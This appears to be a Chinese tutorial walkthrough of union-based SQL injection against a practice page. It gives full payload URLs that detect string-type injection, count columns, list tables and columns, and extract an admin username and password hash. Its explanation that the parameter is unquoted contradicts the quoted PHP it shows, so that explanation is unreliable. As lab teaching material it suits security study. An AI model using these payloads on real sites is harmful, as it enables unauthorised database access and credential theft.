http://www.nanhack.com/payload/sql/char.php?id=1' and 1=1--+ 页面正常
http://www.nanhack.com/payload/sql/char.php?id=1' and 1=2--+ 页面不正常
说明后台sql语句再接受id这个参数的时候,并没有给参数添加引号,所以 1=1(真)和 1=2(假)生效了。如下
$id = $_GET['id'];
$sql = "select * from admins where id = '$id'";
#所以加上 and 1=1 语句就变为:
select * from admins where id = '1' and 1=1 --+' #为真有数据
select * from admins where id = '1' and 1=2 --+' #为假查不到数据
则确定,本页面注入类型为字符型注入。
判断显示位:
http://www.nanhack.com/payload/sql/char.php?id=1' order by 8--+ #正常
http://www.nanhack.com/payload/sql/char.php?id=1' order by 9--+ #不正常,则显示位为8
联合查询
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8--+
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,database(),3,4,5,6,7,8--+ #得到库名nanhack
爆表
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--+
#得到表名 admin_logs,admins,class,facebook,kaiban,message,news,user
爆表 admins 中的所有列
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database() and table_name='admins'--+
# 得到 列名 id,username,userpwd,email,sex,money,role,vip
获取 admins 中的一条数据
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,concat(username,0x23,userpwd),3,4,5,6,7,8 from admins limit 0,1--+
# 得到数据 必火网络安全#68d7e8e91c53395e3d29a938c1ab5d18